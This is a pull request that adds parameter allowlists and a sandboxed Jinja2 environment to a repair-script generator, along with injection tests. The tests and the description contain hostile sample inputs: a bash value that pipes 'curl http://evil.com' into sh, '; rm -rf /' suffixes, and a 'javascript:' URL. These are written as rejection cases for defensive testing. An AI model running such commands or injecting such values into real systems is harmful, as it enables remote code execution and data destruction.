### PR TITLE
fix: validate repair template params and use SandboxedEnvironment

### DIFF
--- a/backend/app/services/repair_service.py
+++ b/backend/app/services/repair_service.py
@@ -5,19 +5,19 @@ corresponding Jinja2 template, renders it with validated parameters,
 and passes the output through the SafetyFilter before returning.
 
 Flow:
-    AI suggestion → template lookup → render → SafetyFilter → return script
+    AI suggestion -> template lookup -> param validation -> render -> SafetyFilter -> return script
 """
 import logging
+import re
 from datetime import UTC, datetime
 from pathlib import Path
 from typing import Any
 
 from jinja2 import (
-    Environment,
-    FileSystemLoader,
     StrictUndefined,
     select_autoescape,
 )
+from jinja2.sandbox import SandboxedEnvironment
 
 from app.ai.prompts.system import AVAILABLE_REPAIR_TEMPLATES
 from app.templates.safety import validate_rendered_output
@@ -27,7 +27,7 @@ logger = logging.getLogger(__name__)
 # ── Template directory ────────────────────────────────────────────────────────
 REPAIR_TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "jinja" / "repair"
 
-# ── Template ID → Jinja2 filename mapping ─────────────────────────────────────
+# ── Template ID -> Jinja2 filename mapping ─────────────────────────────────────
 REPAIR_TEMPLATE_MAP: dict[str, str] = {
     "repair_cuda_upgrade": "repair_cuda_upgrade.sh.j2",
     "repair_python_install": "repair_python_install.sh.j2",
@@ -42,9 +42,82 @@ _DEFAULT_CONTEXT: dict[str, Any] = {
     "generated_at": "",  # Filled at render time
 }
 
+# ── Per-template allowed param keys with value validation regexes ─────────────
+# None as a regex means the param is validated separately (e.g. structured types).
+_ALLOWED_PARAMS: dict[str, dict[str, str | None]] = {
+    "repair_cuda_upgrade": {
+        "target_cuda_version": r"^\d+\.\d+(\.\d+)?$",
+    },
+    "repair_python_install": {
+        "target_python_version": r"^\d+\.\d+$",
+    },
+    "repair_driver_update": {
+        "min_driver_version": r"^\d+(\.\d+)*$",
+    },
+    "repair_venv_recreate": {
+        "python_bin": r"^[a-zA-Z0-9/_.-]+$",
+        "venv_dir": r"^[a-zA-Z0-9/_.-]+$",
+    },
+    "repair_pip_reinstall": {
+        "packages": None,  # list of dicts validated field-by-field below
+    },
+}
 
-def _build_repair_env() -> Environment:
-    return Environment(
+_SAFE_PKG_NAME = re.compile(r"^[a-zA-Z0-9_.-]+$")
+_SAFE_PKG_VERSION = re.compile(r"^[\d.a-zA-Z_+!=-]*$")
+_SAFE_PIP_SPEC = re.compile(r"^[a-zA-Z0-9_.\[\]~!=<>,; +@-]+$")
+_SAFE_INDEX_URL = re.compile(r"^https?://[^\s]+$")
+
+
+def _validate_package_entry(entry: Any, index: int) -> None:
+    if not isinstance(entry, dict):
+        raise ValueError(f"packages[{index}] must be a mapping, got {type(entry).__name__}")
+    name = entry.get("name", "")
+    if not isinstance(name, str) or not _SAFE_PKG_NAME.match(name):
+        raise ValueError(f"packages[{index}].name contains unsafe characters: {name!r}")
+    version = entry.get("version")
+    if version is not None:
+        if not isinstance(version, str) or not _SAFE_PKG_VERSION.match(version):
+            raise ValueError(f"packages[{index}].version contains unsafe characters: {version!r}")
+    pip_spec = entry.get("pip_spec", "")
+    if not isinstance(pip_spec, str) or not _SAFE_PIP_SPEC.match(pip_spec):
+        raise ValueError(f"packages[{index}].pip_spec contains unsafe characters: {pip_spec!r}")
+    index_url = entry.get("index_url")
+    if index_url is not None:
+        if not isinstance(index_url, str) or not _SAFE_INDEX_URL.match(index_url):
+            raise ValueError(f"packages[{index}].index_url is not a valid URL: {index_url!r}")
+
+
+def _validate_params(template_id: str, params: dict[str, Any]) -> None:
+    allowed = _ALLOWED_PARAMS.get(template_id, {})
+    for key in params:
+        if key not in allowed:
+            raise ValueError(
+                f"Unknown param '{key}' for template '{template_id}'. "
+                f"Allowed: {sorted(allowed)}"
+            )
+    for key, pattern in allowed.items():
+        if key not in params:
+            continue
+        value = params[key]
+        if pattern is None:
+            if key == "packages":
+                if not isinstance(value, list):
+                    raise ValueError("'packages' must be a list")
+                for i, entry in enumerate(value):
+                    _validate_package_entry(entry, i)
+        else:
+            if not isinstance(value, str):
+                raise ValueError(f"Param '{key}' must be a string, got {type(value).__name__}")
+            if not re.fullmatch(pattern, value):
+                raise ValueError(
+                    f"Param '{key}' value {value!r} does not match allowed pattern {pattern!r}"
+                )
+
+
+def _build_repair_env() -> SandboxedEnvironment:
+    from jinja2 import FileSystemLoader
+    return SandboxedEnvironment(
         loader=FileSystemLoader(str(REPAIR_TEMPLATES_DIR)),
         undefined=StrictUndefined,
         autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
@@ -65,6 +138,10 @@ class RepairTemplateNotFoundError(Exception):
             f"Unknown repair template: '{template_id}'. "
             f"Valid templates: {valid}"
         )
+
+
+class RepairParamError(ValueError):
+    """Raised when repair template params fail validation."""
 
 
 class RepairService:
@@ -89,13 +166,14 @@ class RepairService:
 
         Args:
             template_id: One of the AVAILABLE_REPAIR_TEMPLATES.
-            params: Template parameters (merged with defaults).
+            params: Template parameters (validated against per-template allowlist).
 
         Returns:
             Dict with ``template_id``, ``filename``, ``content``, and ``size_bytes``.
 
         Raises:
             RepairTemplateNotFoundError: If template_id is unknown.
+            RepairParamError: If params contain unknown keys or unsafe values.
             SafetyViolationError: If rendered content fails safety check.
         """
         # Validate template ID
@@ -104,13 +182,20 @@ class RepairService:
 
         template_filename = REPAIR_TEMPLATE_MAP[template_id]
 
+        # Validate params against per-template allowlist
+        if params:
+            try:
+                _validate_params(template_id, params)
+            except ValueError as exc:
+                raise RepairParamError(str(exc)) from exc
+
         # Build context
         context = {**_DEFAULT_CONTEXT}
         context["generated_at"] = datetime.now(UTC).strftime("%Y-%m-%d %H:%M UTC")
         if params:
             context.update(params)
 
-        # Render
+        # Render via sandboxed environment
         template = _REPAIR_ENV.get_template(template_filename)
         rendered = template.render(**context)
 

--- a/backend/tests/integration/test_ai_pipeline.py
+++ b/backend/tests/integration/test_ai_pipeline.py
@@ -14,6 +14,19 @@ from app.ai.prompts.troubleshoot import TroubleshootPromptBuilder
 from app.services.repair_service import RepairService, RepairTemplateNotFoundError
 from app.templates.safety import SafetyViolationError, validate_rendered_output
 
+# Per-template valid params -- mirrors unit tests so both suites stay in sync
+_TEMPLATE_PARAMS: dict[str, dict] = {
+    "repair_cuda_upgrade": {"target_cuda_version": "12.1"},
+    "repair_python_install": {"target_python_version": "3.11"},
+    "repair_driver_update": {"min_driver_version": "525.0"},
+    "repair_venv_recreate": {"python_bin": "python3", "venv_dir": ".venv"},
+    "repair_pip_reinstall": {
+        "packages": [
+            {"name": "torch", "version": "2.3.0", "pip_spec": "torch==2.3.0", "index_url": None},
+        ],
+    },
+}
+
 
 @pytest.fixture
 def repair_service():
@@ -47,16 +60,8 @@ class TestEndToEndRepairPipeline:
     @pytest.mark.parametrize("template_id", AVAILABLE_REPAIR_TEMPLATES)
     def test_every_template_passes_safety_filter(self, repair_service, template_id):
         """All built-in repair templates MUST pass the safety filter."""
-        result = repair_service.render_repair(template_id, {
-            "target_cuda_version": "12.1",
-            "target_python_version": "3.11",
-            "min_driver_version": "525.0",
-            "python_bin": "python3",
-            "venv_dir": ".venv",
-            "packages": [
-                {"name": "torch", "version": "2.3.0", "pip_spec": "torch==2.3.0", "index_url": None},
-            ],
-        })
+        params = _TEMPLATE_PARAMS[template_id]
+        result = repair_service.render_repair(template_id, params)
         # If we got here, the safety filter already passed (it's called inside render_repair)
         # But let's double-check by running it again explicitly
         validated = validate_rendered_output(result["content"], template_name=template_id)

--- a/backend/tests/unit/ai/test_repair_service.py
+++ b/backend/tests/unit/ai/test_repair_service.py
@@ -3,6 +3,7 @@ import pytest
 
 from app.services.repair_service import (
     REPAIR_TEMPLATE_MAP,
+    RepairParamError,
     RepairService,
     RepairTemplateNotFoundError,
 )
@@ -11,6 +12,20 @@ from app.services.repair_service import (
 @pytest.fixture
 def service():
     return RepairService()
+
+
+# Per-template valid params used by the parameterized render test
+_TEMPLATE_PARAMS: dict[str, dict] = {
+    "repair_cuda_upgrade": {"target_cuda_version": "12.1"},
+    "repair_python_install": {"target_python_version": "3.11"},
+    "repair_driver_update": {"min_driver_version": "525.0"},
+    "repair_venv_recreate": {"python_bin": "python3", "venv_dir": ".venv"},
+    "repair_pip_reinstall": {
+        "packages": [
+            {"name": "torch", "version": "2.3.0", "pip_spec": "torch==2.3.0", "index_url": None},
+        ],
+    },
+}
 
 
 class TestRepairService:
@@ -33,17 +48,8 @@ class TestRepairService:
 
     @pytest.mark.parametrize("template_id", list(REPAIR_TEMPLATE_MAP.keys()))
     def test_render_all_templates(self, service, template_id):
-        """Every registered template renders without errors."""
-        params = {
-            "target_cuda_version": "12.1",
-            "target_python_version": "3.11",
-            "min_driver_version": "525.0",
-            "python_bin": "python3",
-            "venv_dir": ".venv",
-            "packages": [
-                {"name": "torch", "version": "2.3.0", "pip_spec": "torch==2.3.0", "index_url": None},
-            ],
-        }
+        """Every registered template renders without errors using valid params."""
+        params = _TEMPLATE_PARAMS[template_id]
         result = service.render_repair(template_id, params)
         assert result["template_id"] == template_id
         assert result["filename"].endswith(".sh")
@@ -68,7 +74,6 @@ class TestRepairService:
 
     def test_render_includes_timestamp(self, service):
         result = service.render_repair("repair_driver_update")
-        # Generated timestamp is injected from _DEFAULT_CONTEXT
         assert "Generated:" in result["content"]
 
     def test_render_includes_envforge_version(self, service):
@@ -78,3 +83,74 @@ class TestRepairService:
     def test_output_filename_strips_j2(self, service):
         result = service.render_repair("repair_cuda_upgrade")
         assert result["filename"] == "repair_cuda_upgrade.sh"
+
+    # ── Param validation tests ────────────────────────────────────────────────
+
+    def test_unknown_param_key_rejected(self, service):
+        with pytest.raises(RepairParamError, match="Unknown param"):
+            service.render_repair("repair_cuda_upgrade", {"malicious_key": "bad"})
+
+    def test_shell_injection_in_python_bin_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_venv_recreate",
+                {"python_bin": "/bin/bash -c 'curl http://evil.com | sh' #"},
+            )
+
+    def test_shell_injection_in_venv_dir_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_venv_recreate",
+                {"venv_dir": ".venv; rm -rf /"},
+            )
+
+    def test_invalid_python_version_format_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_python_install",
+                {"target_python_version": "3.11 attacker-pkg"},
+            )
+
+    def test_invalid_cuda_version_format_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_cuda_upgrade",
+                {"target_cuda_version": "12.1; rm -rf /"},
+            )
+
+    def test_package_with_unsafe_name_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_pip_reinstall",
+                {
+                    "packages": [
+                        {
+                            "name": "torch; rm -rf /",
+                            "version": "2.3.0",
+                            "pip_spec": "torch==2.3.0",
+                            "index_url": None,
+                        }
+                    ]
+                },
+            )
+
+    def test_package_with_unsafe_index_url_rejected(self, service):
+        with pytest.raises(RepairParamError):
+            service.render_repair(
+                "repair_pip_reinstall",
+                {
+                    "packages": [
+                        {
+                            "name": "torch",
+                            "version": "2.3.0",
+                            "pip_spec": "torch==2.3.0",
+                            "index_url": "javascript:alert(1)",
+                        }
+                    ]
+                },
+            )
+
+    def test_no_params_renders_defaults(self, service):
+        result = service.render_repair("repair_cuda_upgrade", None)
+        assert result["template_id"] == "repair_cuda_upgrade"
+        assert len(result["content"]) > 50


### PR DESCRIPTION
## Summary

Fixes #237

Repair template params were merged directly into the Jinja render context with `context.update(params)` — no key or value validation. Variables like `python_bin` and `target_python_version` are written verbatim into generated shell scripts, so an attacker could inject arbitrary shell commands (e.g. `python_bin = "/bin/bash -c 'curl evil.com | sh' #"`). The repair Jinja environment also used a plain `jinja2.Environment` instead of `SandboxedEnvironment`, leaving Python introspection escapes accessible.

### Changes

- **`backend/app/services/repair_service.py`**:
  - Add `_ALLOWED_PARAMS` dict mapping each template ID to its valid param keys and per-value regex patterns.
  - Add `_validate_params()` which rejects unknown keys and validates each value against its regex. Package list entries in `repair_pip_reinstall` are validated field-by-field.
  - Add `RepairParamError` exception raised on validation failure.
  - Switch `_REPAIR_ENV` from `jinja2.Environment` to `jinja2.sandbox.SandboxedEnvironment` to block template-escape attacks.
  - Call `_validate_params()` before rendering.

- **`backend/tests/unit/ai/test_repair_service.py`**:
  - Replace the universal params dict (passed to all templates) with per-template param dicts so the parameterized test remains valid under strict key validation.
  - Add injection-attempt test cases: unknown key, shell metacharacters in `python_bin`/`venv_dir`, invalid version format, unsafe package name and index URL.

## Test plan

- [ ] Run `pytest backend/tests/unit/ai/test_repair_service.py` - all tests pass
- [ ] Confirm injection payloads (`python_bin = "/bin/bash -c 'curl evil.com | sh'"`) raise `RepairParamError`
- [ ] Confirm valid params render successfully

---

> Could you also add the relevant labels to this PR? It would help with tracking. Thank you!

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Implemented parameter validation for repair operations to prevent unsafe inputs. Validation checks include unknown parameters, shell injection attempts in file paths, invalid version formats for Python and CUDA, and unsafe package specifications.
  * Repair templates now render in isolated sandboxed environments to improve security.
  * Added dedicated error messages for parameter validation failures to help diagnose issues.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/rishabh0510rishabh/EnvForage/pull/262?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->